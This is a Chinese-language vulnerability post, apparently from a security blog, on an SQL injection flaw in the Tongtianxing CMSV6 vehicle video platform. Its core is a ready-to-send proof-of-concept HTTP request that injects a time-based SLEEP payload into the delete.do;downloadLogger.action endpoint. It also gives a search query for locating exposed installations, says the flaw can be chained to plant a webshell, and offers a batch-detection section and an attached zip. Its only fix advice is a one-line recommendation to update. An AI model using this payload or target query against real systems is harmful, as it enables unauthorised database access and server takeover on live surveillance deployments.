一:漏洞描述
通天星CMSV6拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机等产品的视频综合平台。
该产品/run_stop/delete.do;downloadLogger.action接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入webshell木马。
二:漏洞影响版本
version<7.33.0.2_20240305
三:网络空间测绘查询
body="/808gps/"
五:漏洞复现
POC:
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
SQL注入是一种常见的网络应用程序漏洞,攻击者通过利用该漏洞可以执行未经授权的数据库操作。SQL注入漏洞的原理是在应用程序中未对用户输入进行充分验证和过滤,导致恶意用户能够将恶意的SQL代码注入到应用程序的数据库查询语句中,从而实现执行额外的SQL语句。
延时注入是一种利用SQL注入漏洞的技术手段,它的主要目的是通过构造恶意的SQL语句来引发延时操作。攻击者会利用延时函数或延时语句,使得数据库查询操作在执行过程中出现明显的延迟。
延时注入5秒
六:批量检测
七:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。
c0644776bc20240523214432.zip
zip文件
2.6K
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容